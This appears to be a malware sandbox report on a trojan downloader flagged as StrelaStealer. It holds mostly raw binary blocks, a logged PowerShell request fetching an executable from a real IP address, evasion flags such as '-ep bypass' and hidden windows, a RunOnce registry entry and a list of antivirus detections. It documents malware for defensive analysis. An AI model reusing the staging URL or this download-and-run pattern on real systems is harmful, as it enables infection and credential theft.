Data received  s ~2(+*0+bs }  þ  s s'~2(+*0&cs  }  þ  s ~2(+*0&ds } þ s s(+*0'es } þ s s'(+*0"fs } þ s (+*>s'(+*Š: rõps5 zo/o+*0“g þ8þ EI+8DsÉ ~÷{§9Ïÿÿÿ& 8ÄÿÿÿþÊsý s~2(*} ~÷{­:Šÿÿÿ& 8ÿÿÿ0+hsÍ }þÎsý s'~2(*0i þ8þ EF8þÒsý ~2(*} ~÷{Ý:´ÿÿÿ& 8©ÿÿÿsÑ ~÷{ª:Žÿÿÿ& 8ƒÿÿÿ0+jsÕ }þÖsý s'~2(*0&ksÙ }þÚsý ~2(*0&lsÝ }þÞsý s(*0'msá }þâsý s'(*0"nså }þæsý (*>s'(*0Yo{: r%ps÷ z: rõps5 z(í(‹ Ý (0( (Œ Ý*(=0*ps } þ s s~2(+*0+qs } þ s s'~2(+*0&rs } þ s ~2(+*0+ss  }! þ" s s'~2(+*0&ts# }$ þ% s ~2(+*0&us& }' þ( s s(+*0'vs) }* þ+ s s'(+*0"ws, }- þ. s (+*>s'(+*0Yx{: r%ps÷ z: rõps5 z(+(/ Ý (0( (0 Ý*(=0(ysù }&þús1 (+:**¢~3 %:&~4 þ5 sK%€3 s6*vs6 %}7 þ8 sKs6*¶~9 %:&~: þ; s< %€9 (@s6*Šs= %}> þ? s< (@s6*s@ *vsA %}B þC sD ( +*0“ þ8þ E/HF8*{0: ~÷{Ù9Çÿÿÿ& 8¼ÿÿÿ(.z}0 8¥ÿÿÿ*8èÿÿÿ ~÷{ñ:Šÿÿÿ& 8ÿÿÿ0€ þ8þ E/[8*{09% ~÷{Á:Ëÿÿÿ& 8Àÿÿÿ(.z}0 ~÷{Ñ:Ÿÿÿÿ& 8”ÿÿÿ*0€ þ8þ E18,*{09% ~÷{í:Éÿÿÿ& 8¾ÿÿÿ(.z}0 ~÷{ÿ:ÿÿÿ& 8’ÿÿÿÎ(2%: &röps5 z}%:&~(1*0Zz}5}6}7}8}9( }4}3{4 (!+|4( *0Z{}E }F }G }H }I (J }K }L {K ("+|K (N *0T|s!%}O%{O( ~.%98&~þssO %€.þ"sP ((*0T|s%%}Q%{Q( ~/%98&~þtsO %€/þ&sP ((*ªs)%}S%{S( þ*sP ((*ªs-%}U%{U( þ.sP ((*0T|s1%}W%{
Data received sø %€¶ (/*08Zsš }{: r  ps5 zþ›sÄ (4*08[s¢ } { : rú ps5 zþ£sÄ (4*08\s¦ }{: r  ps5 zþ§sÄ (4*08]s® }{: rú ps5 zþ¯sÄ (4*08^s² }{: r  ps5 zþ³sÄ (4*0‚_sº }$}&<rŠ pr‹ps4 z: r° ps5 z{&: rú ps5 z(¯ (}+}%þ»s8 {$o7sH *08`sÄ }3{3: r  ps5 zþÅsÄ (8*08asÌ }<{<: rú ps5 zþÍsÄ (8*08bsÐ }>{>: r  ps5 zþÑsÄ (8*08csØ }H{H: r° ps5 zþÙs± (9*0‡dsÜ }J}K}L}M{K<rŠ pr‹ps4 z{L: r° ps5 z{M: rú ps5 zþÝs8 {Jo7sH *0,5~·%:&~³þOs® %€· (?*07esç }[{[: r  ps5 zþèsÄ (@*07fsï }c{c: rú ps5 zþðsÄ (@*07gsó }e{e: r  ps5 zþôsÄ (@*07hsû }n{n: rú ps5 zþüsÄ (@*07isÿ }p{p: r  ps5 zþ sÄ (@*0djs  }z}{}|{{: rÜ ps5 z{|: rú ps5 zþ s8 {zo7sH *0=<: r° ps5 z~¸%:&~³þPsø %€¸ (C*0=@: r° ps5 z~¹%:&~³þQsú %€¹ (E*0_ks  }‰}Š{‰: r° ps5 z{Š: r  ps5 zþ s² þ sú (E*0_ls  }Œ}{Œ: r° ps5 z{: rú ps5 zþ s² þ sÅ (F*0Hms  }: r° ps5 z{: r  ps5 zþ sÅ (F*07ns#  }˜{˜: r° ps5 zþ$ s± (G*0dos'  }š}›}œ{›: r° ps5 z{œ: rú ps5 zþ( s8 {šo7sH *&~²þ*~²*"(š+*0,£~Ó %:&~Ô þÕ sÖ %€Ó (›+*&(›+*0N¤s× }Ø <rŠ pr‹ps4 z{Ø : r  ps5 zþÙ sÚ (œ+*&(œ+*0u¥sÛ }Ü }Ý }Þ {Ý <rŠ pr‹ps4 z{Þ : r  ps5 zþß sD {Ü o& {Ü o' sà *0+Í~á %:&~â þã sè %€á (+*06¦sä }å {å : r  ps5 zþæ s÷ (ž+*0R§sç }è }é {é : r  ps5 zþê sD {è o& {è o' sà *0-¨~ë %:&~ì þí sî %€ë (Ÿ+*08©sï }ð {ð : r  ps5 zþñ sî (Ÿ+*08ªsò }ó {ó : r  ps5 zþô sî (Ÿ+*0«sõ }ö }÷ <rŠ pr‹ps4 z: r° ps5 z{÷ : r  ps5 z(
Data received þ E8*{o] ~÷{ý9Íÿÿÿ& 8Âÿÿÿ&~þ*~*(* *0P þ8þ E8*{o] ~÷{Ö9Íÿÿÿ& 8Âÿÿÿ&~þ*~*(* *0P þ8þ E08+{o^ ~÷{¶:Îÿÿÿ& 8Ãÿÿÿ*&~þ*~*(* *0P þ8þ E08+{o^ ~÷{ß:Îÿÿÿ& 8Ãÿÿÿ*&~þ*~*(* *0P þ8þ E8*{o^ ~÷{è:Íÿÿÿ& 8Âÿÿÿ&~þ*~*(* *2{j o` *(* *2{k o` *(* *2{l o` *(* *6{m od *(* *6{n od *(* *6{o og *(* *6{p og *(* *6{q og *(* *B{&oLþ*&~'þ*~'*.sr €s *(* *0R þ8þ E 8**uò:óÿÿÿ ~÷{Ý9Ëÿÿÿ& 8Àÿÿÿ&~t þ*~t *(* *0”Ž þ8þ E@<8;uò¥ò%Œò9 ~÷{â9¾ÿÿÿ& 8³ÿÿÿ**{u ov :ìÿÿÿ ~÷{¡:‰ÿÿÿ& 8~ÿÿÿ&~w þ*~w *.sx €y *(* **uòþ*&~z þ*~z *(* *0k þ8þ E8{{ ov **uò¥ò%Œò9æÿÿÿ ~÷{â:²ÿÿÿ& 8§ÿÿÿ&~| þ*~| *(* *0FŒò9{} Œòþòo~ :Œò:{} Œòþ***0T þ8þ EeúS,û8`{5 ~÷{ç:Âÿÿÿ& 8·ÿÿÿþ}3 ~÷{þ:›ÿÿÿ& 8ÿÿÿ{3 8~ÿÿÿ:µ þ8þ E·,¡WÊfix  ±â‘8}: ~÷{:¢ÿÿÿ& 8—ÿÿÿ|:þ7 ~÷{ 9wÿÿÿ& 8lÿÿÿ{: 8Zÿÿÿ8éÿÿÿ 8Kÿÿÿ%}3 ~÷{ß:-ÿÿÿ& 8"ÿÿÿ(õ :ó 8 ÿÿÿ(ó  8ùþÿÿ|4(>+ 8áþÿÿ%}3 ~÷{«9Ãþÿÿ& 8¸þÿÿr=ps÷ z{{6{7{8{9o {9o÷  ~÷{:hþÿÿ& 8]þÿÿ{:¤ÿÿÿ ~÷{ñ9=þÿÿ& 82þÿÿݨ 8#þÿÿ(ô 8þÿÿݺýÿÿ ~÷{:& 8þ EC8|4( 8Óÿÿÿþ}3 ~÷{·:·ÿÿÿ& 8¬ÿÿÿÝ 8éüÿÿ*|4( ~÷{Ï:Éüÿÿ& 8¾üÿÿA• ¡~0P þ8þ E8*|4( ~÷{ã:Íÿÿÿ& 8Âÿÿÿ&~;þ*~;*(* *0!‘ þ8þ EŽ,BöT|8‰}€ ~÷{Å9ºÿÿÿ& 8¯ÿÿÿ( } 8™ÿÿÿ}‚ 8‡ÿÿÿ{  ~÷{À:jÿÿÿ& 8_ÿÿÿ}ƒ 8Mÿÿÿ(?+ ~÷{¦90ÿÿÿ& 8%ÿÿÿ| ( *}„ ~÷{:üþÿÿ& 8ñþÿÿ&~… þ*~… *0Ú“ þ8þ EAXB8<{‹  8Ìÿÿÿ9ì 8þ EzÄD6ð%PõÊÞ
Data received 8'þ}¹ ~÷{µ:Îÿÿÿ& 8Ãÿÿÿ|¸ (– þ8¤ÿÿÿÝ úÿÿ ~÷{ô9šùÿÿ& 8ùÿÿA49Hš—Kâ‚0P þ8þ E08+|¸ (™ ~÷{Ì9Îÿÿÿ& 8Ãÿÿÿ* * *0 K þ8þ E ,¹ à 8ˆ þ} ~÷{å9Æÿÿÿ& 8»ÿÿÿ EÊYa ~÷{ì9& !8þ E/œ %6¼v}k4_Oÿ¤º…é ¨ø82næÏà B‹Ö•Á™9_ës u'!Åj†8— | (+ &þ8ÿÿÿ{ { o }! 8ýþÿÿ(N  ~÷{è:àþÿÿ& 8ÕþÿÿŒò9 ~÷{:µþÿÿ& 8ªþÿÿÝCþÿÿ .8›þÿÿ|" þØ 8…þÿÿþòŒòþòo~ :« +þ8Rþÿÿ (M  ~÷{µ:9þÿÿ& $8.þÿÿ(P 9V "8þÿÿ8_ 8 þÿÿ{h~ (ñ 9? ~÷{Ä:ßýÿÿ& 8Ôýÿÿ{# Œò:% )8ºýÿÿ% } 8¦ýÿÿ8¤þÿÿ '8—ýÿÿ{$ { {% oˆ {& oK  ~÷{¯:_ýÿÿ& 8TýÿÿÝÈ ~÷{Ä9;ýÿÿ& 80ýÿÿ ~÷{Û9ýÿÿ& 8 ýÿÿ{$ { {% oˆ {& oK  ~÷{è9Õüÿÿ& 8Êüÿÿ{"  þ8°üÿÿ{#  8¢üÿÿ(N  ~÷{:…üÿÿ& 8züÿÿ{' { {! o 8Yüÿÿ ~÷{¯9Düÿÿ& 89üÿÿ ;L 8þ E L.@ì_k6V¼Ô8G{(  þ 8¨ÿÿÿÝB þ 8•ÿÿÿ }( 8‡ÿÿÿ|( þ7 8qÿÿÿ (ô þ 8Xÿÿÿ{) {! {# {% {& o* {& o÷  ~÷{¾9ÿÿÿ& 8 ÿÿÿ|  ( + 8óþÿÿ% } þ 8×þÿÿ% } ~÷{ø9½þÿÿ& 8²þÿÿ{+ { {! o 8‘þÿÿ (õ :ÿÿÿ 8{þÿÿ(ó  8hþÿÿÝÑýÿÿ ~÷{ê9& 8þ E=88{, { {! o ~÷{Ö:Áÿÿÿ& 8¶ÿÿÿÝ]ýÿÿ 8úÿÿ{"  ~÷{ã9ëùÿÿ& 8àùÿÿÝT (8Ñùÿÿ8*ýÿÿ 8Âùÿÿ ,~÷{:­ùÿÿ& 8¢ùÿÿ8éüÿÿ ~÷{:‰ùÿÿ& 8~ùÿÿ|% (c *8iùÿÿ% } ~÷{Ò9Kùÿÿ& 8@ùÿÿ (M  #8-ùÿÿ{- { {# o.  þ8ùÿÿ(P 9‘ÿÿÿ 8ðøÿÿ}" ~÷{:Ôøÿÿ& 8Éøÿÿ{! :eüÿÿ ~÷{ø:ªøÿÿ& 8Ÿøÿÿ|# þòŒòþòo~ 9¸þÿÿ 8pøÿÿ% } ~÷{¨9Røÿÿ& 8Gøÿÿ| (+ ~÷{ì9%øÿÿ& %8øÿÿݳ÷ÿÿ 8 øÿÿ|" þØ ~÷{¶:ë÷ÿÿ& 8à÷ÿÿ}" ~÷{9Ä÷ÿÿ& 8¹÷ÿÿ{/ { {! o ~÷{é:Ž÷ÿÿ& 8ƒ÷ÿÿ ;R ~÷{£9& 8þ E ¤Í+TX€öˆ³,8Ÿ}" ~÷{³9¦ÿÿÿ& 8›ÿÿÿ (M  ~÷{Ã:~ÿÿÿ& 8sÿÿÿ{) {! {% {& o0 {& oK  8?ÿÿÿ|" þØ ~÷{¨:ÿÿÿ& 8ÿÿÿ(P 9X þ8öþÿÿ% } ~÷{
Data received /nB;xRR‡R™R½pR‡R+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n¼/+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n¼/+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n+n/n!„j„j„ô„ô„p…¼/+n/nP:¼/+n+n+n+n+n+n+n+n+n+n+n+nxRR‡R+n/n+n+n+n+n+n+n+n+n+n+n+n+nxRR‡R™R+n/ná:+nWk³k¶k+nWk³k¶k+n+n+nWk³k¶k+nWk³k¶k+n+n+nWk³k¶k+nWk³k¶k+n+nWk³k¶kWk³k¶kxRR‡R+nWk³k¶k+nWk³k¶k+n+n+nWk³k¶k+nWk³k¶k+n+n+nWk³k¶k+nWk³k¶k+n+nWk³k¶kWk³k¶kxRR‡R™RxRR㕽pR㕽pR㕽pRã•xRRã•™R½pRã•™R½pRã•™R½pRã•™R?õ7{:¸–£Gv:
Data received ÛÞY·ÇÜꃕÁ³|/ŽúBörøžšÂk0¿Eⴆ—ôn€¿ä@ ú˜ºõŠxé܇•¨´\@4ÀÍh¬-¼¶)ææýkù 2ÚÎÖXÍô(#8²àf†¡n*Œ';[5>·¾Á+ù.jsò-TÚ~e*¶ U4†m†äa `Às¹å€o¦ñ1èᄸ ;~‘Ý 6fPÀù [з8=AM”fÊOÌ+÷|m,ãà :¿ðþ ›ð`›iÌÛ)öVY °Ú=4ÄA²¬‰ûÔi9š`N”ªn9"’¬Ûٙƒ”7 `¶·èЪ4åm|;aÍ,ÄãM¶W‰éT",-‡e˜ÃËÈ'Øì4-°ñwmÑ"EžS¤æd<›ÿ  µÊvÍÃßíå\ |c$Ý¡ÿì*)C]È?/P XL.¾äîwʚj”ª²n›Mφøg—)ÖÇ©VŸ-X35“]‡G.óG–í¹ë¨Gk<ì$…:GDjà›³C$eNµŠ=3Á€ŒêI²æåÆә^] ³¡Çl”6@øHÍvn[ºD~´Zº* ÔiFä£àðæ1zF’IüÜsö­êâd8à± iÔÙÃå‡ÝVÇ£à2…£ÿÁèPO½ •°±{xBð¸Àƒ¯·“WÀ©©„j%%æ„]a¬ˆA#9çJÍEºš¯'¹ëìÃÝSUŸ‡ãëý_[-}fãG˜˜³@»ÖñÑ(ŽÓ{áO`q‰.¢Ì Á|yÚeòÀ³ð‘^`Ÿ° j˜õôu Å`E/ç&¬Ö­Ÿ™G¼Œ.@o‡ïCyæ”ÞÓaj&ïê÷0Hÿä-“¦œüN,»à˜'n‘à5Åw·¤Ãv 1ÆóäHpà'_wßZ‡½Q§_HŒ:X—ó9ó ÈFóæPL‚r’Èk¦ã.À›Äp_/ù¨·€°õƃçkFšÛYI—k?SX‚®DŸ½›»«Þ¢QùøˆÁ¡üãú;c¼'å‹|“~­H‡Ãø`Œ$ãÉ{¹B±ÇêÀÍãâú)‹î¹}Ÿ@՘œyIÿiBB^¥<G>Ül1™’‡DF ´Fµ†–’0P?S06H°ùræþzAéK—$¹š… åص‘÷¦ovÅ×óÊ\m—,x,lhTEJ➼TzÃq—™ë9M;ölåƒ1x€?_&,=E)U¯«S²Ú~IÅáÕ¶4z˼§Ÿº•qvi¨-ýÊý¨ŒÃ$?Äz|$É5Ðk>L•\—`µ±>«Fß2Qý(4\B¨¥‚©¸TPïe[ôx Ñ åÚ§ Á͐5$Š·|ŽŠ$öPUSÕ/7@Lüžfeːˆ,?ª9(ª*Mq¯Ow̕gwt_Uü“v ‹‡ MÖnR c93¶Æ}ÓYXdîݳn¯Éõ½«–8ƒÛ™•…÷i,¯¤:©Íáñ{7k’M†XÕ­ºG£– s-qùcc”³ÔÏfŠðL³i+/#WšÕ#l%ÿº¢¬â“:ùHٞ¡µ{ɨвd 2Uma.XÃNXÕé(§‹¿=™ê3ë£$ñöØìênlˆ]·Sÿó8˜2̎äGóŠVÌoáŸgCQIs³dà³À€ ÈîqdÆðéÜ®«_ˆqSvùùã§~^âioàÈYõZY•Ó¯kÌ@•e“zÕ2Â$yËò¦Ó[2úööj¸PÜX3•€ÓUäãFÙPI}ÆÚX῏¼T €ãìø9a6¾¤¥–Í"@‰4™c:Í3琮÷›-ä9:6ڂµo¯põÛ¯~, Æïml뎼ùHœÄVpbš£³¡í¼ÿd_uO÷žóªµø•MÝGÞ{D<ËG€={´º×ƒvM´M€0Ö?l”šŒˆ±P¦*Rv¯Ÿ=\oÄêTc¹*MÖl”Z17fäó_ä˜ä’ßÃäŠ\ᛉG#Õ]”§OJò8l핷Ÿ3•†MIPknÑÙ0e¤Òý¹s´¡¿`¶î¶ŸûôÛ-x$ ù=˟"kÀʌlŠT¢ÞTîø²jø»>~2û]iža#—¨Ïg¶ø¦R0%c>{TŽùqûVP¦±dèc+Ÿ¹ÜX¼{ÜÏô].‹Ìtæßc‡ Ä"ó6@’Ö±ŠÁðÝÌ«,ø·h„ÿ(:‚ÀëÂâO[QÞO5kdtÄNÆxÿ•”[)–íÅ@cL#Cm0t‘Å«¾_ڝ+3¦ÎC¤™G×d\{ÙOXØÄ'·%Œ·y¹ó¾&E.›5·ÌՑLÆØH~–†¾Žú›J/ù—èžø“&1À–ƒ{õu¢[2ٜºˆwt£òû)4.Ã6«C+¶£S…ÆOqýÆ9•pê£(¿oO&)¹Ç4 8@·:ÚLš¹ZY§ \ÛV®“²=G«Rû“‡ §ÜU‹7Caâ»ÊwÓ ’c¡f¤–·Ë].¼¾Œýk÷G"øƒ%»„¼iôL¹~øß ‘) yö³¤ƒµž~ÞXîU¼Œ D*$d«#„0‹Èbr=a³µmÅ6Èà Í¬¡Ì¨°îTeÈ¢ÿʯÃG´ êD9n‘Kƃ[r> £þ‰L/ «út}‘MP¬G<·íp™&Jýþ2wGßÒ,njàíwÕá¶lªW ±ø0)ÆÔøÄEìՒ>qfÊ¡ •x’ „cp·´ñ­ùñôtÏ'F 0V{‰9YG@ÄG‹mE;?÷AW{ùhJXF†¦š„ˆÀ) 썻À~†Ÿ„×e•K2wa;èO9/v§H]7 ð»ƒÏÿÅjŸì)xô¢;fû=ËdfÓ¼%äHG§¦}ðgÌîzŽ£­ŒÛÛ|B9f*:6n dßÆ<ö͛]à‰Ûeû’öêƒ è ïMÐç¦Q°&?ŸÙHXg¹׍ø†¼tfs仫§¾^MÇZ;™ßª@N~dG^ôU2乞uú¯QÚW÷§o¯Äëòâ¡ï–†êlÍ£ƒõ;Ѐþ§©2@HAõ3Åi%/êXîŸßJ5—ÔÅoÆøqæ8†߉›T,µ§+â¹·Þ0” V×ynS@‡Gâùoç'•ióa×Ê#Íþažd©Ïʃjõö9ýUu.Õ֗ÜXZõߢ®:Êï(®‘Bòç×E¼âR)ÜÏüTcßë¼ȗD.}óp|Bö¤Ü¾ébkçÖL*á_!Ÿ¨fcÂ!fýÆwÜQ÷úr—µ‚ðQ¾‰,åwۗ$qc0ä0^Ýau-¢ž<ÐN•‹óÓiè*¡“$c7JÅïá*šu€#¦BE{]øp‰Q²îÙËäQEŠ¦Ý+²0Öø^H«²C(Ëgx½Ýì‰^÷‰7OüÔNÎáõLrÄRÀ˝0ˉ”¥¦|3XÒâÌ.·)C«–jT"Œñ(.Ñê„}T+©¶ŽèŒÄÞµA±Â Û­L¥ùG\²r¸«ÑÍ”ð¥%ÅHÃÊ.§áž[R¤dµ]ĸ”iù¥)5ü3÷¯þ!C°ï’«ÃÓBÃ[âóq¸8îCûõI㍓}6¯mߤŽ6€ùq䩶é1yÇ<ªw¸‘bí1÷/ôJ¸4g¿0CNdSe—^lfdÙSúþ³þS”þö`Ù[î¡k§+äÇ v¬7ž"¡SȲȈ.ÿç aˆß0ï÷A×: «·üKk'B!e¶BÅÜ
Data sent GET /a0001/0228-01/positivereduce.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.5486 Host: 23.27.46.60 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 23.27.46.60
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
Time & API Arguments Status Return Repeated

send

 buffer: GET /a0001/0228-01/positivereduce.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.5486 Host: 23.27.46.60 Connection: Keep-Alive
socket: 1256
sent: 188
1 188 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:51:54 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 28 Feb 2025 15:09:34 GMT ETag: "1d7200-62f3531ba2a41" Accept-Ranges: bytes Content-Length: 1929728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÑÁgà hþ…  @ à`…°…K ¸À  H.textf h `.rsrc¸ j@@.reloc Àp@Bà…HotˆŠàú*(*0£ þ8þ EoB8} 8Ôÿÿÿ( } ~÷{å:´ÿÿÿ& 8©ÿÿÿ|(+ ~÷{Ð:‡ÿÿÿ& 8|ÿÿÿ|( *0z þ8þ E+V8( ~÷{ª9Ïÿÿÿ& 8Äÿÿÿ(o  ~÷{Â:¤ÿÿÿ& 8™ÿÿÿ*&~þ*~*0/( }}|(+|( *0/( } } | (+| ( *0  þ8þ E8*($ o%  ~÷{û9& 8þ E8ݹÿÿÿ& ~÷{þ:& 8þ E8s# z ~÷{ì:[ÿÿÿ& 8Pÿÿÿ(Ck8&~þ*~*0¥  þ8þ ER,8M} ~÷{Á:Îÿÿÿ& 8Ãÿÿÿs ~÷{ò:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() :8s# z*&~þ*~*0Ó  þ8þ E8*o- 98s# zo. & ~÷{9& 8þ E8ݨÿÿÿ& ~÷{¸9& 8þ E8s# z ~÷{©9Jÿÿÿ& 8?ÿÿÿ&V|8&~þ*~*(* *0« þ8þ E1U~8,r­pÐ (/ o0 s1 € þ8¶ÿÿÿ8H ~÷{:¡ÿÿÿ& 8–ÿÿÿ~9¦ÿÿÿ ~÷{¯:xÿÿÿ& 8mÿÿÿ~*~*€*j(#rïp~o2 t*&~þ*~*0™  þ8þ E?8(,*~ %986& ~÷{ä:»ÿÿÿ& 8°ÿÿÿ~þes3 %€  ~÷{Î9„ÿÿÿ& 8yÿÿÿ&(,*0™  þ8þ E?8:(,*~!%986& ~÷{:»ÿÿÿ& 8°ÿÿÿ~þfs3 %€! ~÷{é9„ÿÿÿ& 8yÿÿÿ0¤ sƒ }>=rÿpr%ps4 z<rgpr‹ps4 z{>: råps5 z(ã }? ÿÿÿY> ÿÿÿ8X (ã }@þ„s6 {?{@sµ *0” þ8þ E:8(0*~"%:6
received: 2920
socket: 1256
1 2920 0
option -ep bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Lionic Trojan.Win32.Generic.4!c
Cynet Malicious (score: 99)
CAT-QuickHeal cld.trojan.multi
Skyhigh BehavesLike.Win64.Downloader.ch
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.928.78081E43
CrowdStrike win/malicious_confidence_90% (W)
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Generik.DFHLNP
APEX Malicious
Avast Other:Malware-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
MicroWorld-eScan Heur.BZC.MNT.Boxter.928.78081E43
F-Secure Trojan.TR/AVI.Agent.rayca
TrendMicro TrojanSpy.Win64.STRELASTEALER.YXFCAZ
McAfeeD ti!D6B04E732ECE
CTX exe.trojan.generic
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Themida
Google Detected
Avira TR/AVI.Agent.rayca
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:Win32/Wacatac.B!ml
GData BAT.Malware.InvalidBOM.A
Varist ABDownloader.USN
AhnLab-V3 Trojan/Win.Malware-gen.C5735810
McAfee Artemis!8199D03B6325
DeepInstinct MALICIOUS
Panda Trj/Chgt.AD
TrendMicro-HouseCall TrojanSpy.Win64.STRELASTEALER.YXFCAZ
Tencent Win32.Trojan-Downloader.Agent.Wimw
Fortinet W32/PossibleThreat
AVG Other:Malware-gen [Trj]
Paloalto generic.ml